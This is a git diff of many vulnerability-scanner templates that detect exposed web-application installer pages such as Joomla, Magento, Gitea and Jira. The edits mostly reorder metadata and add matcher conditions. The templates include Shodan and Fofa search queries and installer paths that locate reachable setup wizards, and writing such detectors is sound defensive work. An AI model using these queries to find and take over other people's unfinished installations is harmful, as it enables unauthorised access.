b/http/misconfiguration/installer/cloudcenter-Installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: unknown metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"CloudCenter Installer" tags: misconfig,cisco,cloudcenter,install,exposure diff --git a/http/misconfiguration/installer/codeigniter-installer.yaml b/http/misconfiguration/installer/codeigniter-installer.yaml index e73562e35b..8fc2286652 100644 --- a/http/misconfiguration/installer/codeigniter-installer.yaml +++ b/http/misconfiguration/installer/codeigniter-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: unknown metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Codeigniter Application Installer" tags: misconfig,codeigniter,install,exposure diff --git a/http/misconfiguration/installer/combodo-itop-installer.yaml b/http/misconfiguration/installer/combodo-itop-installer.yaml index 507159d0e7..6425112e65 100644 --- a/http/misconfiguration/installer/combodo-itop-installer.yaml +++ b/http/misconfiguration/installer/combodo-itop-installer.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.itophub.io/wiki/page?id=2_4_0:install:install_wizard metadata: + verified: true max-request: 2 shodan-query: html:"Installation" html:"itop" - verified: true tags: misconfig,itop,install,exposure http: @@ -19,6 +19,7 @@ http: - '{{BaseURL}}/itop/setup/wizard.php' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/concrete-installer.yaml b/http/misconfiguration/installer/concrete-installer.yaml index 0b33750992..a2f53ebb19 100644 --- a/http/misconfiguration/installer/concrete-installer.yaml +++ b/http/misconfiguration/installer/concrete-installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Install concrete" tags: misconfig,exposure,install,concrete diff --git a/http/misconfiguration/installer/contentify-installer.yaml b/http/misconfiguration/installer/contentify-installer.yaml index 3dbb8f34c9..c8864fa053 100644 --- a/http/misconfiguration/installer/contentify-installer.yaml +++ b/http/misconfiguration/installer/contentify-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 1 verified: true + max-request: 1 tags: misconfig,contentify,install,exposure http: diff --git a/http/misconfiguration/installer/discourse-installer.yaml b/http/misconfiguration/installer/discourse-installer.yaml index 037eb1c67a..23725f7752 100644 --- a/http/misconfiguration/installer/discourse-installer.yaml +++ b/http/misconfiguration/installer/discourse-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: unknown metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Discourse Setup" tags: misconfig,discourse,install diff --git a/http/misconfiguration/installer/dokuwiki-installer.yaml b/http/misconfiguration/installer/dokuwiki-installer.yaml index 3cb902dba1..6a150a353c 100644 --- a/http/misconfiguration/installer/dokuwiki-installer.yaml +++ b/http/misconfiguration/installer/dokuwiki-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"DokuWiki" tags: misconfig,dokuwiki,install,exposure diff --git a/http/misconfiguration/installer/dolibarr-installer.yaml b/http/misconfiguration/installer/dolibarr-installer.yaml index 96a6232690..78de0f3664 100644 --- a/http/misconfiguration/installer/dolibarr-installer.yaml +++ b/http/misconfiguration/installer/dolibarr-installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Dolibarr install or upgrade" tags: misconfig,exposure,install diff --git a/http/misconfiguration/installer/dolphin-installer.yaml b/http/misconfiguration/installer/dolphin-installer.yaml index dbec994889..488a9fb5c0 100644 --- a/http/misconfiguration/installer/dolphin-installer.yaml +++ b/http/misconfiguration/installer/dolphin-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: icon_hash="-945121295" tags: misconfig,dolphin,install,exposure diff --git a/http/misconfiguration/installer/easyscripts-installer.yaml b/http/misconfiguration/installer/easyscripts-installer.yaml index e945a5a69b..1ccfd5cc96 100644 --- a/http/misconfiguration/installer/easyscripts-installer.yaml +++ b/http/misconfiguration/installer/easyscripts-installer.yaml @@ -5,8 +5,8 @@ info: author: theamanrawat severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Installer - Easyscripts" tags: misconfig,easyscripts,installer diff --git a/http/misconfiguration/installer/eshop-installer.yaml b/http/misconfiguration/installer/eshop-installer.yaml index 46a67f0c76..5e8be63d56 100644 --- a/http/misconfiguration/installer/eshop-installer.yaml +++ b/http/misconfiguration/installer/eshop-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"eShop Installer" tags: misconfig,eshop,install,exposure diff --git a/http/misconfiguration/installer/espeasy-installer.yaml b/http/misconfiguration/installer/espeasy-installer.yaml index b61c46ac71..e4a44f79b6 100644 --- a/http/misconfiguration/installer/espeasy-installer.yaml +++ b/http/misconfiguration/installer/espeasy-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: medium metadata: - max-request: 1 verified: true + max-request: 1 tags: misconfig,espeasy,install,exposure http: @@ -16,6 +16,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/facturascripts-installer.yaml b/http/misconfiguration/installer/facturascripts-installer.yaml index b591c7d21d..8e984f7066 100644 --- a/http/misconfiguration/installer/facturascripts-installer.yaml +++ b/http/misconfiguration/installer/facturascripts-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"FacturaScripts installer" tags: misconfig,facturascripts,install,exposure diff --git a/http/misconfiguration/installer/geniusocean-installer.yaml b/http/misconfiguration/installer/geniusocean-installer.yaml index 8946af1ba7..302b9e5209 100644 --- a/http/misconfiguration/installer/geniusocean-installer.yaml +++ b/http/misconfiguration/installer/geniusocean-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"GeniusOcean Installer" tags: misconfig,geniusocean,install,exposure diff --git a/http/misconfiguration/installer/getsimple-installation.yaml b/http/misconfiguration/installer/getsimple-installation.yaml index 2a437fd04d..af99e0e516 100644 --- a/http/misconfiguration/installer/getsimple-installation.yaml +++ b/http/misconfiguration/installer/getsimple-installation.yaml @@ -5,15 +5,15 @@ info: author: princechaddha severity: critical description: GetSimple CMS installer was found. + reference: + - http://get-simple.info/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H cvss-score: 9.4 cwe-id: CWE-284 - reference: - - http://get-simple.info/ - tags: getsimple,exposure,installer,misconfig metadata: max-request: 1 + tags: getsimple,exposure,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/gibbon-installer.yaml b/http/misconfiguration/installer/gibbon-installer.yaml index d3d54f8cb2..e0622f1343 100644 --- a/http/misconfiguration/installer/gibbon-installer.yaml +++ b/http/misconfiguration/installer/gibbon-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: high metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: icon_hash="-165631681" tags: misconfig,gibbon,install,exposure diff --git a/http/misconfiguration/installer/gitea-installer.yaml b/http/misconfiguration/installer/gitea-installer.yaml index 8bbd3cd237..07f7c992fe 100644 --- a/http/misconfiguration/installer/gitea-installer.yaml +++ b/http/misconfiguration/installer/gitea-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: medium metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"' tags: misconfig,gitea,install diff --git a/http/misconfiguration/installer/gogs-installer.yaml b/http/misconfiguration/installer/gogs-installer.yaml index 0da4cef821..fe42d9b682 100644 --- a/http/misconfiguration/installer/gogs-installer.yaml +++ b/http/misconfiguration/installer/gogs-installer.yaml @@ -10,8 +10,8 @@ info: cvss-score: 9.4 cwe-id: CWE-284 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Installation - Gogs" tags: misconfig,exposure,gogs,install diff --git a/http/misconfiguration/installer/impresspages-installer.yaml b/http/misconfiguration/installer/impresspages-installer.yaml index 7340eadade..b61182d90a 100644 --- a/http/misconfiguration/installer/impresspages-installer.yaml +++ b/http/misconfiguration/installer/impresspages-installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"ImpressPages installation wizard" tags: misconfig,exposure,install,impresspages @@ -31,4 +31,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/installer/indegy-sensor-installer.yaml b/http/misconfiguration/installer/indegy-sensor-installer.yaml index 47b2c2fbbf..1b165d550b 100644 --- a/http/misconfiguration/installer/indegy-sensor-installer.yaml +++ b/http/misconfiguration/installer/indegy-sensor-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Setup Wizard" http.favicon.hash:-1851491385 tags: misconfig,indegy,sensor,installer diff --git a/http/misconfiguration/installer/jira-setup.yaml b/http/misconfiguration/installer/jira-setup.yaml index 7ff2b27932..81537d2385 100644 --- a/http/misconfiguration/installer/jira-setup.yaml +++ b/http/misconfiguration/installer/jira-setup.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"JIRA - JIRA setup" tags: misconfig,jira,atlassian,installer @@ -19,6 +19,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/joomla-installer.yaml b/http/misconfiguration/installer/joomla-installer.yaml index 7651937704..f5b9c3f87c 100644 --- a/http/misconfiguration/installer/joomla-installer.yaml +++ b/http/misconfiguration/installer/joomla-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Joomla Web Installer" tags: misconfig,joomla,install diff --git a/http/misconfiguration/installer/klr300n-installer.yaml b/http/misconfiguration/installer/klr300n-installer.yaml index b17ed06001..0328e64d9e 100644 --- a/http/misconfiguration/installer/klr300n-installer.yaml +++ b/http/misconfiguration/installer/klr300n-installer.yaml @@ -10,8 +10,8 @@ info: - http://www.keo.com.br/produtos/roteador-klr-300n - http://www.keo.com.br/wp-content/uploads/2017/09/Manual_KLR_300N_03-17_site.pdf metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"def_wirelesspassword" tags: keo,klr300n,misconfig,exposure,iot,install @@ -21,6 +21,7 @@ http: - "{{BaseURL}}" host-redirects: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/limesurvey-installer.yaml b/http/misconfiguration/installer/limesurvey-installer.yaml index a1abcc2a0c..acd3523dfd 100644 --- a/http/misconfiguration/installer/limesurvey-installer.yaml +++ b/http/misconfiguration/installer/limesurvey-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Limesurvey Installer" tags: misconfig,limesurvey,install diff --git a/http/misconfiguration/installer/lmszai-installer.yaml b/http/misconfiguration/installer/lmszai-installer.yaml index 7484b0ff0c..580f75ca10 100644 --- a/http/misconfiguration/installer/lmszai-installer.yaml +++ b/http/misconfiguration/installer/lmszai-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"LMSZAI - Learning Management System" tags: misconfig,blesta,install,exposure diff --git a/http/misconfiguration/installer/lychee-installer.yaml b/http/misconfiguration/installer/lychee-installer.yaml index 6ca930ddc4..3c42d93d37 100644 --- a/http/misconfiguration/installer/lychee-installer.yaml +++ b/http/misconfiguration/installer/lychee-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Lychee-installer" tags: misconfig,lychee,install,exposure diff --git a/http/misconfiguration/installer/magento-installer.yaml b/http/misconfiguration/installer/magento-installer.yaml index 1d6da8466e..fbe0b36ab8 100644 --- a/http/misconfiguration/installer/magento-installer.yaml +++ b/http/misconfiguration/installer/magento-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Magento Installation" tags: misconfig,magento,install,exposure diff --git a/http/misconfiguration/installer/magnolia-installer.yaml b/http/misconfiguration/installer/magnolia-installer.yaml index 0b5a4315ca..e39d0e86e1 100644 --- a/http/misconfiguration/installer/magnolia-installer.yaml +++ b/http/misconfiguration/installer/magnolia-installer.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.magnolia-cms.com/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Magnolia Installation" tags: magnolia,exposure,installer,misconfig diff --git a/http/misconfiguration/installer/mantisbt-installer.yaml b/http/misconfiguration/installer/mantisbt-installer.yaml index 5a62dab438..3a50f3ba06 100644 --- a/http/misconfiguration/installer/mantisbt-installer.yaml +++ b/http/misconfiguration/installer/mantisbt-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Administration - Installation - MantisBT" tags: misconfig,mantisbt,install,exposure diff --git a/http/misconfiguration/installer/matomo-installer.yaml b/http/misconfiguration/installer/matomo-installer.yaml index cbf22271dd..c9b530f432 100644 --- a/http/misconfiguration/installer/matomo-installer.yaml +++ b/http/misconfiguration/installer/matomo-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Matomo" tags: misconfig,matomo,install diff --git a/http/misconfiguration/installer/mautic-installer.yaml b/http/misconfiguration/installer/mautic-installer.yaml index e20c45c8ad..a7d2c5afab 100644 --- a/http/misconfiguration/installer/mautic-installer.yaml +++ b/http/misconfiguration/installer/mautic-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Mautic Installation" tags: misconfig,mautic,install diff --git a/http/misconfiguration/installer/mcloud-installer.yaml b/http/misconfiguration/installer/mcloud-installer.yaml index b42e3c6ebe..ca335ae606 100644 --- a/http/misconfiguration/installer/mcloud-installer.yaml +++ b/http/misconfiguration/installer/mcloud-installer.yaml @@ -5,15 +5,15 @@ info: author: ritikchaddha severity: critical description: mCloud installer was detected. + reference: + - https://mcloudcorp.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H cvss-score: 9.4 cwe-id: CWE-284 - reference: - - https://mcloudcorp.com/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"mcloud-installer-web" tags: panel,mcloud,exposure,misconfig diff --git a/http/misconfiguration/installer/metaview-explorer-installer.yaml b/http/misconfiguration/installer/metaview-explorer-installer.yaml index b7f73f960e..1f4fb964d6 100644 --- a/http/misconfiguration/installer/metaview-explorer-installer.yaml +++ b/http/misconfiguration/installer/metaview-explorer-installer.yaml @@ -5,8 +5,8 @@ info: author: theamanrawat severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"MetaView Explorer" tags: misconfig,metaview,installer diff --git a/http/misconfiguration/installer/monstra-installer.yaml b/http/misconfiguration/installer/monstra-installer.yaml index 2c23705d11..4133c913e5 100644 --- a/http/misconfiguration/installer/monstra-installer.yaml +++ b/http/misconfiguration/installer/monstra-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: 'title:"Monstra :: Install"' tags: misconfig,monstra,install diff --git a/http/misconfiguration/installer/moodle-installer.yaml b/http/misconfiguration/installer/moodle-installer.yaml index 5fafee21b0..2764d04e2d 100644 --- a/http/misconfiguration/installer/moodle-installer.yaml +++ b/http/misconfiguration/installer/moodle-installer.yaml @@ -5,8 +5,8 @@ info: author: tess severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Installation Moodle" tags: misconfig,moodle,install,exposure diff --git a/http/misconfiguration/installer/nagiosxi-installer.yaml b/http/misconfiguration/installer/nagiosxi-installer.yaml index b7ae335ee1..dc0b452df5 100644 --- a/http/misconfiguration/installer/nagiosxi-installer.yaml +++ b/http/misconfiguration/installer/nagiosxi-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Nagios XI" tags: misconfig,exposure,install,nagiosxi diff --git a/http/misconfiguration/installer/netsparker-enterprise-installer.yaml b/http/misconfiguration/installer/netsparker-enterprise-installer.yaml index d6fec0b55b..cef339c09e 100644 --- a/http/misconfiguration/installer/netsparker-enterprise-installer.yaml +++ b/http/misconfiguration/installer/netsparker-enterprise-installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1575154882 tags: misconfig,exposure,install,netsparker diff --git a/http/misconfiguration/installer/nginx-auto-installer.yaml b/http/misconfiguration/installer/nginx-auto-installer.yaml index ed36827ea6..a918ab615e 100644 --- a/http/misconfiguration/installer/nginx-auto-installer.yaml +++ b/http/misconfiguration/installer/nginx-auto-installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"NginX Auto Installer" tags: misconfig,nginx,install,exposure diff --git a/http/misconfiguration/installer/nodebb-installer.yaml b/http/misconfiguration/installer/nodebb-installer.yaml index d8ec1bd66c..8e56d52564 100644 --- a/http/misconfiguration/installer/nodebb-installer.yaml +++ b/http/misconfiguration/installer/nodebb-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"NodeBB Web Installer" tags: misconfig,nodebb,install,exposure diff --git a/http/misconfiguration/installer/nopcommerce-installer.yaml b/http/misconfiguration/installer/nopcommerce-installer.yaml index 3168d14e2a..607469f12b 100644 --- a/http/misconfiguration/installer/nopcommerce-installer.yaml +++ b/http/misconfiguration/installer/nopcommerce-installer.yaml @@ -7,14 +7,14 @@ info: description: nopCommerce installer panel was detected. reference: - https://www.nopcommerce.com/ - metadata: - max-request: 1 - verified: true - shodan-query: html:"nopCommerce Installation" classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H cvss-score: 9.4 cwe-id: CWE-284 + metadata: + verified: true + max-request: 1 + shodan-query: html:"nopCommerce Installation" tags: misconfig,nopcommerce,install http: diff --git a/http/misconfiguration/installer/ojs-installer.yaml b/http/misconfiguration/installer/ojs-installer.yaml index e11a8597f3..27bb7db64b 100644 --- a/http/misconfiguration/installer/ojs-installer.yaml +++ b/http/misconfiguration/installer/ojs-installer.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDK severity: high metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:2099342476 - verified: true tags: misconfig,ojs,install,exposure http: @@ -17,6 +17,7 @@ http: - '{{BaseURL}}/index.php/index/install' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/openmage-install.yaml b/http/misconfiguration/installer/openmage-install.yaml index 38c3a5aca5..b18515d0c5 100644 --- a/http/misconfiguration/installer/openmage-install.yaml +++ b/http/misconfiguration/installer/openmage-install.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"OpenMage Installation Wizard" tags: misconfig,openmage,install,exposure diff --git a/http/misconfiguration/installer/openshift-installer-panel.yaml b/http/misconfiguration/installer/openshift-installer-panel.yaml index 3b05a28872..24abf06b40 100644 --- a/http/misconfiguration/installer/openshift-installer-panel.yaml +++ b/http/misconfiguration/installer/openshift-installer-panel.yaml @@ -10,8 +10,8 @@ info: cvss-score: 4.6 cwe-id: CWE-284 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"OpenShift Assisted Installer" tags: panel,openshift,cluster,misconfig diff --git a/http/misconfiguration/installer/opensis-installer.yaml b/http/misconfiguration/installer/opensis-installer.yaml index e06525b21c..ef4a7ea233 100644 --- a/http/misconfiguration/installer/opensis-installer.yaml +++ b/http/misconfiguration/installer/opensis-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"openSIS" tags: misconfig,opensis,install,exposure diff --git a/http/misconfiguration/installer/orangehrm-installer.yaml b/http/misconfiguration/installer/orangehrm-installer.yaml index 1a39e9b35d..3d97a7af45 100644 --- a/http/misconfiguration/installer/orangehrm-installer.yaml +++ b/http/misconfiguration/installer/orangehrm-installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"OrangeHRM Web Installation Wizard" tags: misconfig,exposure,install,orangehrm @@ -31,4 +31,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/installer/owncloud-installer-exposure.yaml b/http/misconfiguration/installer/owncloud-installer-exposure.yaml index 82f8fc4ddf..7a8f7ac067 100644 --- a/http/misconfiguration/installer/owncloud-installer-exposure.yaml +++ b/http/misconfiguration/installer/owncloud-installer-exposure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"owncloud" tags: misconfig,owncloud,exposure,install @@ -17,6 +17,7 @@ http: - '{{BaseURL}}/owncloud/' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/oxid-eshop-installer.yaml b/http/misconfiguration/installer/oxid-eshop-installer.yaml index fd622b3ee1..4dd6ba2869 100644 --- a/http/misconfiguration/installer/oxid-eshop-installer.yaml +++ b/http/misconfiguration/installer/oxid-eshop-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"OXID eShop installation" tags: misconfig,oxid,eshop,install,exposure diff --git a/http/misconfiguration/installer/pagekit-installer.yaml b/http/misconfiguration/installer/pagekit-installer.yaml index b8bae2821e..25db2a6f7a 100644 --- a/http/misconfiguration/installer/pagekit-installer.yaml +++ b/http/misconfiguration/installer/pagekit-installer.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/pagekit/pagekit metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Pagekit Installer" tags: misconfig,pagekit,install,exposure diff --git a/http/misconfiguration/installer/permissions-installer.yaml b/http/misconfiguration/installer/permissions-installer.yaml index a2a2b4264d..512001bc7b 100644 --- a/http/misconfiguration/installer/permissions-installer.yaml +++ b/http/misconfiguration/installer/permissions-installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:" Permissions | Installer" tags: misconfig,permissions,install,exposure diff --git a/http/misconfiguration/installer/phpbb-installer.yaml b/http/misconfiguration/installer/phpbb-installer.yaml index 65c3457828..45991cfa8a 100644 --- a/http/misconfiguration/installer/phpbb-installer.yaml +++ b/http/misconfiguration/installer/phpbb-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Installation Panel" tags: misconfig,phpbb,install,exposure diff --git a/http/misconfiguration/installer/phpwind-installer.yaml b/http/misconfiguration/installer/phpwind-installer.yaml index 808b181e7d..6c797ec547 100644 --- a/http/misconfiguration/installer/phpwind-installer.yaml +++ b/http/misconfiguration/installer/phpwind-installer.yaml @@ -5,8 +5,8 @@ info: author: tess severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Powered by phpwind" tags: misconfig,phpwind,exposure,install diff --git a/http/misconfiguration/installer/piwik-installer.yaml b/http/misconfiguration/installer/piwik-installer.yaml index b4386259ff..d1c5bba4e8 100644 --- a/http/misconfiguration/installer/piwik-installer.yaml +++ b/http/misconfiguration/installer/piwik-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Piwik › Installation" tags: misconfig,piwik,install diff --git a/http/misconfiguration/installer/pmm-installer.yaml b/http/misconfiguration/installer/pmm-installer.yaml index 71e36809b5..75bedc7adb 100644 --- a/http/misconfiguration/installer/pmm-installer.yaml +++ b/http/misconfiguration/installer/pmm-installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"PMM Installation Wizard" tags: misconfig,exposure,install,pmm diff --git a/http/misconfiguration/installer/prestashop-installer.yaml b/http/misconfiguration/installer/prestashop-installer.yaml index 72f37583b1..ed1ad9c0b4 100644 --- a/http/misconfiguration/installer/prestashop-installer.yaml +++ b/http/misconfiguration/installer/prestashop-installer.yaml @@ -5,8 +5,8 @@ info: author: tess severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"PrestaShop Installation Assistant" tags: misconfig,prestashop,exposure,install diff --git a/http/misconfiguration/installer/processwire-installer.yaml b/http/misconfiguration/installer/processwire-installer.yaml index 15769013b2..3afe9d893b 100644 --- a/http/misconfiguration/installer/processwire-installer.yaml +++ b/http/misconfiguration/installer/processwire-installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: unknown metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"ProcessWire 3.x Installer" tags: misconfig,processwire,install,exposure @@ -17,6 +17,7 @@ http: - '{{BaseURL}}/install.php' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/redash-installer.yaml b/http/misconfiguration/installer/redash-installer.yaml index 76ff9ac539..586dcd5eda 100644 --- a/http/misconfiguration/installer/redash-installer.yaml +++ b/http/misconfiguration/installer/redash-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Redash Initial Setup" tags: misconfig,redash,install diff --git a/http/misconfiguration/installer/server-monitor-installer.yaml b/http/misconfiguration/installer/server-monitor-installer.yaml index 7b27e614f2..17ac6cdd2e 100644 --- a/http/misconfiguration/installer/server-monitor-installer.yaml +++ b/http/misconfiguration/installer/server-monitor-installer.yaml @@ -5,8 +5,8 @@ info: author: tess severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SERVER MONITOR - Install" tags: misconfig,monitor,exposure,install diff --git a/http/misconfiguration/installer/shopify-app-installer.yaml b/http/misconfiguration/installer/shopify-app-installer.yaml index 53ac09d383..99fec09b62 100644 --- a/http/misconfiguration/installer/shopify-app-installer.yaml +++ b/http/misconfiguration/installer/shopify-app-installer.yaml @@ -5,8 +5,8 @@ info: author: tess severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Shopify App — Installation" tags: misconfig,shopify,install @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/shopware-installer.yaml b/http/misconfiguration/installer/shopware-installer.yaml index 6e99754fa8..3b341b23a2 100644 --- a/http/misconfiguration/installer/shopware-installer.yaml +++ b/http/misconfiguration/installer/shopware-installer.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.shopware.com/en/ metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="Installation | Shopware 6" tags: misconfig,shopware,install,exposure diff --git a/http/misconfiguration/installer/smf-installer.yaml b/http/misconfiguration/installer/smf-installer.yaml index f5c08c5ac0..e156f857e2 100644 --- a/http/misconfiguration/installer/smf-installer.yaml +++ b/http/misconfiguration/installer/smf-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SMF Installer" tags: misconfig,smf,install,exposure diff --git a/http/misconfiguration/installer/sms-installer.yaml b/http/misconfiguration/installer/sms-installer.yaml index 3e97d1953e..81a9524145 100644 --- a/http/misconfiguration/installer/sms-installer.yaml +++ b/http/misconfiguration/installer/sms-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"SMS Gateway | Installation" tags: misconfig,sms,install diff --git a/http/misconfiguration/installer/spip-install.yaml b/http/misconfiguration/installer/spip-install.yaml index c68f7bff74..93f6cf2876 100644 --- a/http/misconfiguration/installer/spip-install.yaml +++ b/http/misconfiguration/installer/spip-install.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: high metadata: - max-request: 1 verified: "true" + max-request: 1 tags: exposure,spip,install,misconfig http: @@ -16,6 +16,7 @@ http: host-redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/suitecrm-installer.yaml b/http/misconfiguration/installer/suitecrm-installer.yaml index 35750a2205..cea0c30cbc 100644 --- a/http/misconfiguration/installer/suitecrm-installer.yaml +++ b/http/misconfiguration/installer/suitecrm-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SuiteCRM" tags: misconfig,suitecrm,install diff --git a/http/misconfiguration/installer/sumowebtools-installer.yaml b/http/misconfiguration/installer/sumowebtools-installer.yaml index 